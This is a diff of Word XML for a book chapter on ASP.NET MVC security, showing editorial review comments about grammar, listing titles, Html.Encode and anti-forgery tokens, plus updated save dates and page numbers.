+  </w:comment>
+  <w:comment w:id="20" w:author="Jeffrey" w:date="2010-02-18T15:58:00Z" w:initials="J">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Tried it.  I need help </w:t>
+      </w:r>
+      <w:r>
+        <w:sym w:font="Wingdings" w:char="F04C"/>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="23" w:author="Katharine Osborne" w:date="2010-02-20T19:43:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
       </w:pPr>
-    </w:p>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>That’s odd that it didn’t work for you. No problem though, we can deal with this in copy editing.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="24" w:author="JSkinner" w:date="2010-03-02T18:31:00Z" w:initials="JS">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>FYI to insert an em dash in Word 2007 you can use ctrl+alt+numpad minus</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="25" w:author="JSkinner" w:date="2010-03-03T18:06:00Z" w:initials="JS">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>I couldn't get this sample to work in Chrome. I didn't realise that Chrome prevented these vulnerabilities until I read your note later in the chapter. I wonder if it would be worth including it sooner?</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+  </w:comment>
+  <w:comment w:id="28" w:author="JSkinner" w:date="2010-03-02T19:01:00Z" w:initials="JS">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Generally recommended to use Html.Encode rather than HttpUtility.HtmlEncode</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="35" w:author="Katharine Osborne" w:date="2010-02-06T23:47:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
       </w:pPr>
       <w:r>
-        <w:t>There is some odd capitalization here.</w:t>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>http://mng.bz/Z3V5</w:t>
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="1" w:author="Katharine Osborne" w:date="2010-02-06T23:24:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
+  <w:comment w:id="36" w:author="Jeffrey" w:date="2010-02-18T16:01:00Z" w:initials="J">
+    <w:p>
+      <w:r>
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t>Is the user authenticated or the username and password? If the former then, “he is authenticated” or “the user is authenticated”. If the latter, the “they are authenticated”.</w:t>
+        <w:t>We'll do a URL sweep before typesetting.</w:t>
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="2" w:author="Jeffrey" w:date="2010-02-18T15:45:00Z" w:initials="J">
+  <w:comment w:id="45" w:author="JSkinner" w:date="2010-03-02T19:14:00Z" w:initials="JS">
     <w:p>
       <w:r>
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t>Fixed it using the singular, form, "he".</w:t>
+        <w:t xml:space="preserve">You've explained how to use the anti-forgery tokens but there's no explanation of how it works under the covers. I think this would be very useful and would also be consistent with when you explained how the AuthorizeAttribute worked earlier in the chapter. </w:t>
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="3" w:author="Katharine Osborne" w:date="2010-02-06T23:25:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
+  <w:comment w:id="48" w:author="JSkinner" w:date="2010-03-03T17:59:00Z" w:initials="JS">
+    <w:p>
+      <w:r>
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t>Here “it” again refers to the the user. I assume this was meant to be the resource instead. Rewrite for proper agreement.</w:t>
+        <w:t xml:space="preserve">Fixed indenting. </w:t>
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="4" w:author="Jeffrey" w:date="2010-02-18T15:46:00Z" w:initials="J">
+  <w:comment w:id="150" w:author="JSkinner" w:date="2010-03-03T17:59:00Z" w:initials="JS">
     <w:p>
       <w:r>
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t>Fixed it</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="5" w:author="Katharine Osborne" w:date="2010-02-06T23:26:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>Should be code font.</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="6" w:author="Katharine Osborne" w:date="2010-02-06T23:38:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>What do these do? Maybe this information might be better off in a table. What do you think?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Would it be possible to see any of these in an example?</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="7" w:author="Jeffrey" w:date="2010-02-18T15:55:00Z" w:initials="J">
-    <w:p>
-      <w:r>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>I added a sentence above refering to Chapter 9 where filters were covered in detail.</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="8" w:author="Katharine Osborne" w:date="2010-02-06T23:39:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>This is hyphenated up above. Which way is correct?</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="9" w:author="Jeffrey" w:date="2010-02-18T15:56:00Z" w:initials="J">
-    <w:p>
-      <w:r>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>It should be hyphenated</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="10" w:author="Katharine Osborne" w:date="2010-02-06T23:40:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>Dashes used to show a pause should be em dashes (type the dash character twice to get an em dash in Word). Just FYI.</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="11" w:author="Jeffrey" w:date="2010-02-18T15:58:00Z" w:initials="J">
-    <w:p>
-      <w:r>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Tried it.  I need help </w:t>
-      </w:r>
-      <w:r>
-        <w:sym w:font="Wingdings" w:char="F04C"/>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="12" w:author="Katharine Osborne" w:date="2010-02-06T23:42:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>Shouldn’t the reader already know this, or am I missing something?</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="13" w:author="Jeffrey" w:date="2010-02-18T16:00:00Z" w:initials="J">
-    <w:p>
-      <w:r>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>Yes, the reader will already know.  Some of our readers will likely always use F5 as well.</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="14" w:author="Katharine Osborne" w:date="2010-02-06T23:46:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>I love this bit. It’s a very strong thesis statement. The second sentence makes it decidedly not bland.</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="15" w:author="Katharine Osborne" w:date="2010-02-06T23:47:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>http://mng.bz/Z3V5</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="16" w:author="Jeffrey" w:date="2010-02-18T16:01:00Z" w:initials="J">
-    <w:p>
-      <w:r>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>We'll do a URL sweep before typesetting.</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="17" w:author="Katharine Osborne" w:date="2010-02-06T23:51:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Love it! Very apt metaphor </w:t>
-      </w:r>
-      <w:r>
-        <w:sym w:font="Wingdings" w:char="F04A"/>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="18" w:author="Katharine Osborne" w:date="2010-02-06T23:52:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>Does this need to be it’s own paragraph?</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="19" w:author="Jeffrey" w:date="2010-02-18T16:03:00Z" w:initials="J">
-    <w:p>
-      <w:r>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>No.  I changed it.</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="20" w:author="Katharine Osborne" w:date="2010-02-18T16:04:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>This needs to be a bit more descriptive. What about, “Using Html.AntiForgeryToken()”?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">It may seem a bit nitpicky, but it’s part of Manning’s style to start code listing titles with a verb (or at least be a bit more descriptive than one word). The idea is to emphasize the fact that the user can do something with the listing. </w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="21" w:author="Jeffrey" w:date="2010-02-18T16:04:00Z" w:initials="J">
-    <w:p>
-      <w:r>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>Changed it.</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="22" w:author="Katharine Osborne" w:date="2010-02-06T23:57:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>Make sure all the code listing titles are more descriptive.</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="23" w:author="Jeffrey" w:date="2010-02-18T16:05:00Z" w:initials="J">
-    <w:p>
-      <w:r>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>done</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="24" w:author="Katharine Osborne" w:date="2010-02-06T23:57:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>There’s a lot going on in the listing above. Does this need a bit more explanation?</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="25" w:author="Jeffrey" w:date="2010-02-18T16:08:00Z" w:initials="J">
-    <w:p>
-      <w:r>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>Added another sentence</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="26" w:author="Katharine Osborne" w:date="2010-02-06T23:58:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>This is a much better listing title.</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="27" w:author="Katharine Osborne" w:date="2010-02-06T23:58:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>What are the other techniques?</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="28" w:author="Jeffrey" w:date="2010-02-18T16:09:00Z" w:initials="J">
-    <w:p>
-      <w:r>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>Added "this technique"</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="29" w:author="Katharine Osborne" w:date="2010-02-06T23:59:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">“We explored </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>them</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> using…”</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="30" w:author="Katharine Osborne" w:date="2010-02-06T23:59:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> “…and to HTML encode all…”</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="31" w:author="Jeffrey" w:date="2010-02-18T16:10:00Z" w:initials="J">
-    <w:p>
-      <w:r>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>Changed it.  Thanks</w:t>
+        <w:t>Fixed indenting.</w:t>
       </w:r>
     </w:p>
   </w:comment>
@@ -4885,7 +5607,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>16</w:t>
+        <w:t>4</w:t>
       </w:r>
     </w:fldSimple>
     <w:r>
@@ -4914,12 +5636,22 @@
       <w:t xml:space="preserve">Last saved: </w:t>
     </w:r>
     <w:fldSimple w:instr=" SAVEDATE  \@ &quot;M/d/yyyy&quot;  \* MERGEFORMAT ">
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>2/7/2010</w:t>
-      </w:r>
+      <w:ins w:id="247" w:author="JSkinner" w:date="2010-03-03T18:04:00Z">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>3/3/2010</w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="248" w:author="JSkinner" w:date="2010-03-03T18:04:00Z">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:delText>2/21/2010</w:delText>
+        </w:r>
+      </w:del>
     </w:fldSimple>
   </w:p>
 </w:hdr>
@@ -4940,12 +5672,22 @@
       <w:t xml:space="preserve">Last saved: </w:t>
     </w:r>
     <w:fldSimple w:instr=" SAVEDATE  \@ &quot;M/d/yyyy&quot;  \* MERGEFORMAT ">
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>2/7/2010</w:t>
-      </w:r>
+      <w:ins w:id="249" w:author="JSkinner" w:date="2010-03-03T18:04:00Z">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>3/3/2010</w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="250" w:author="JSkinner" w:date="2010-03-03T18:04:00Z">
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:delText>2/21/2010</w:delText>
+        </w:r>
+      </w:del>
     </w:fldSimple>
     <w:r>
       <w:tab/>
@@ -4973,7 +5715,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>17</w:t>
+        <w:t>3</w:t>
       </w:r>
     </w:fldSimple>
   </w:p>
@@ -9005,7 +9747,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4EB9A61A-6CDE-484B-AF6B-D7DF945DD187}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{62DE6DD5-6607-4548-968E-585D253A6455}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
